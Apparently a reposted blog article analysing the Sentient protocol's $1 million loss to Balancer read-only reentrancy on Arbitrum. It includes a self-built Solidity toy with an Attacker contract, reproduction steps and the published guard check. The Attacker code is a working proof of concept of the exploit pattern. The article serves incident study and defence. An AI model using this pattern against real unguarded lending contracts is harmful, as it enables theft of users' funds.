Sentient Lost $1 Million Due to Balancer's Read-Only Reentrancy on the Arbitrum Network

Security team: Sentient lending protocol loses $1 million on the Arbitrum network

On April 5th, PeckShield monitoring reported that Sentient, a permissionless under-collateralized lending protocol, was drained of about $1 million on the Arbitrum network in the early hours of the morning. The root cause was read-only reentrancy in Balancer: a pool's reported rate can be read, through an ordinary view function, at a moment when the pool's accounting is inconsistent, and Sentient priced its collateral with that rate. In this article, we will explore this incident in detail and understand what Balancer is and how this property of its contracts contributed to the theft.

What is Balancer?

Balancer is a programmable liquidity platform that allows users to create liquidity pools for trading assets. It can be thought of as a self-balancing index fund for cryptocurrencies. It is implemented as a set of smart contracts and is deployed on the Ethereum mainnet and on several other chains, including Arbitrum, where this incident took place. Balancer allows users to create custom pools, set fees for trading, and earn rewards for providing liquidity. It supports many assets, including ETH, USDT, and USDC. A pool's liquidity providers hold pool tokens whose value per token (the pool's "rate") is exposed by a view function, and other protocols commonly read that value to price the pool tokens.

How does Balancer's Read-Only Reentrancy Affect Security?

Reentrancy arises when a contract hands control to another contract, for example by sending it ETH, before it has finished updating its own state; the callee can then call back in and act on the stale state. Protocols normally guard their state-changing functions with a reentrancy lock. Read-only reentrancy is the variant the lock does not cover: view functions are not locked, so any contract that calls them during the callback gets values computed from half-updated state. Balancer's Vault is a well-known case. When a pool is joined or exited, the Vault sends ETH to the recipient before the pool's balances are finalised, so the pool's reported rate read inside that callback is wrong. Balancer's own funds are not at risk from this; the protocols at risk are the ones that consume those view functions as a price oracle.
That is what happened to Sentient. It accepted Balancer pool tokens as collateral and valued them with the pool's rate. The attacker, funded by flash loans (uncollateralised loans that are borrowed and repaid within one transaction), exited a Balancer pool and, from inside the Vault's ETH callback, called into Sentient while the rate was inflated, borrowing far more than the collateral was actually worth. Once the Balancer transaction completed the rate returned to normal, leaving Sentient with bad debt of about $1 million and the attacker with the difference.
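The following Solidity is an added example, constructed for this article; it is not Balancer's or Sentient's code. It collapses Balancer's Vault and pool into one toy contract (ToyVault) whose exit burns pool tokens, then sends ETH, then updates reserves, so getRate() is inflated while the recipient has control. The Lender contract prices pool tokens with that rate; with guarded = false it is drained the way the text describes, and with guarded = true it applies the check Balancer publishes for integrators (VaultReentrancyLib.ensureNotInVaultContext, which probes the Vault's guarded manageUserBalance and distinguishes the reentrancy revert from the ordinary static-call revert). All contract and function names here are assumptions for the illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Constructed toy, not Balancer's or Sentient's code. ToyVault burns pool tokens, then
// sends ETH (handing control to the caller), then updates reserves: getRate() is stale meanwhile.
contract ToyVault {
    uint256 private _status = 1;                   // 1 = idle, 2 = entered
    uint256 public reserves;                       // ETH the pool believes it holds
    uint256 public totalSupply;                    // pool tokens outstanding
    mapping(address => uint256) public balanceOf;  // pool tokens per holder

    modifier nonReentrant() {
        require(_status == 1, "REENTRANCY");
        _status = 2;
        _;
        _status = 1;
    }

    function joinPool() external payable nonReentrant {
        balanceOf[msg.sender] += msg.value;        // 1 pool token per wei deposited
        totalSupply += msg.value;
        reserves += msg.value;
    }

    function exitPool(uint256 amount) external nonReentrant {
        balanceOf[msg.sender] -= amount;
        totalSupply -= amount;                     // supply shrinks now ...
        (bool ok, ) = msg.sender.call{value: amount}("");  // ... control leaves ...
        require(ok, "ETH_SEND_FAILED");
        reserves -= amount;                        // ... reserves shrink too late
    }

    // ETH per pool token, 1e18-scaled. The lock above does not cover views, so
    // inside the exitPool callback this returns reserves(old) / supply(new).
    function getRate() external view returns (uint256) {
        return totalSupply == 0 ? 1e18 : reserves * 1e18 / totalSupply;
    }

    // Guarded no-op, like Balancer's manageUserBalance: integrators probe it to see if the vault is entered.
    function manageUserBalance() external nonReentrant {}
}

// Lender that values a user's pool tokens with vault.getRate(). It reads the user's balance
// straight from the vault instead of custodying tokens (a brevity shortcut; the oracle problem is the same).
contract Lender {
    ToyVault public immutable vault;
    bool public immutable guarded;                 // true = apply the fix
    mapping(address => uint256) public debt;

    constructor(ToyVault v, bool guarded_) payable { vault = v; guarded = guarded_; }

    // Mirrors Balancer's VaultReentrancyLib.ensureNotInVaultContext: staticcall a guarded function.
    // Outside the vault it reverts with EMPTY data (storage write in a static context);
    // inside the vault it reverts with the guard's reason string, which means pool state is stale.
    function ensureNotInVaultContext() internal view {
        (, bytes memory ret) = address(vault).staticcall{gas: 10_000}(
            abi.encodeWithSelector(ToyVault.manageUserBalance.selector)
        );
        bytes32 reentrancyError = keccak256(abi.encodeWithSignature("Error(string)", "REENTRANCY"));
        require(keccak256(ret) != reentrancyError, "VAULT_REENTRANCY");
    }

    // Lend ETH at 80% loan-to-value against the caller's pool tokens.
    function borrow(uint256 amount) external {
        if (guarded) ensureNotInVaultContext();
        uint256 value = vault.balanceOf(msg.sender) * vault.getRate() / 1e18;
        require(debt[msg.sender] + amount <= value * 80 / 100, "INSUFFICIENT_COLLATERAL");
        debt[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "ETH_SEND_FAILED");
    }
}

// Attacker: joins with N ether, exits 90% of it, and borrows from inside the vault's
// ETH callback, when each remaining token is priced as if it were ten.
contract Attacker {
    ToyVault immutable vault;
    Lender immutable lender;
    uint256 public borrowed;                       // ETH obtained from the lender

    constructor(ToyVault v, Lender l) { vault = v; lender = l; }

    function attack() external payable {
        vault.joinPool{value: msg.value}();
        vault.exitPool(msg.value * 9 / 10);        // triggers receive() below
    }

    receive() external payable {
        if (msg.sender == address(vault)) {
            // Mid-exit: reserves still = N, supply = N/10, so getRate() = 10e18.
            uint256 inflated = vault.balanceOf(address(this)) * vault.getRate() / 1e18;
            lender.borrow(inflated * 80 / 100);    // unguarded: 0.8N ETH; guarded: reverts
        } else {
            borrowed += msg.value;                 // ETH arriving from the lender
        }
    }
}
```

To reproduce: deploy ToyVault, a Lender with guarded = false funded with at least 8 ether, and an Attacker, then call attack{value: 10 ether}(). Afterwards borrowed() is 8 ether and the attacker's debt is backed by one pool token worth 1 ETH once reserves are updated. With guarded = true the probe sees the vault's "REENTRANCY" revert, borrow() reverts with VAULT_REENTRANCY, the vault's ETH send fails, and the whole attack() transaction reverts (surfacing as ETH_SEND_FAILED). The gas cap on the staticcall matters: it bounds what the probed contract can do, and the revert data, not the call's success flag, is what carries the signal.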

Lessons Learned

The Sentient incident highlights several critical security issues within DeFi protocols. The first lesson is the importance of thorough auditing of smart contracts before deployment, and in particular of auditing what a protocol reads from other protocols: Balancer had publicly documented this read-only reentrancy, together with a check that integrators should perform before reading pool state, months before the attack, so the flaw could have been caught in review. Secondly, the fix is small (one check that the Vault is not mid-operation before trusting a pool's rate), yet omitting it cost users about $1 million; small oversights in oracle code have outsized impact. Lastly, although it played no part in this exploit, the incident is a reminder of basic custody hygiene: non-custodial wallets such as hardware wallets, and proper storage and handling of private keys.

Conclusion

Sentient's loss on the Arbitrum network was a significant incident that highlighted the importance of smart contract auditing, the fragility of cross-protocol dependencies in DeFi, and wallet security. Read-only reentrancy in Balancer's Vault, exploited through Sentient's use of a Balancer pool rate as a price oracle, was the root cause and led to the loss of about $1 million. Understanding these issues matters more as DeFi protocols are composed together, because a flaw in one protocol's view functions becomes a vulnerability in every protocol that trusts them.

FAQs

What steps can be taken to prevent similar attacks in the future?

Proper auditing of smart contracts, including every external view function a protocol relies on for pricing; applying known fixes (for Balancer integrations, checking that the Vault is not mid-operation before reading pool state); using secure wallet storage and handling techniques; and educating users about security best practices are all critical steps that can prevent similar attacks in the future.

What other DeFi protocols are vulnerable to similar attacks?

Unfortunately, any DeFi protocol that reads prices, rates or balances from another contract that makes external calls mid-operation is exposed to the same class of bug; lending protocols that accept liquidity-pool tokens as collateral are the usual victims. Hence all DeFi protocols need to conduct regular security audits to identify and remove such vulnerabilities.

How can users protect themselves from such attacks?

Users can protect themselves by using non-custodial wallets such as hardware wallets, keeping their private keys safe, avoiding interactions with unverified smart contracts, and keeping up to date with the latest security risks and best practices.

This article and its pictures are from the Internet and do not represent aiwaka's position. If it infringes your rights, please contact us for removal: https://www.aiwaka.com/2023/04/05/sentient-lost-1-million-due-to-balancers-read-only-and-reentrant-nature-on-arbitrum-network/

It is strongly recommended that you independently study, review, analyze and verify the content, use the relevant data and content with care, and bear all risks arising therefrom.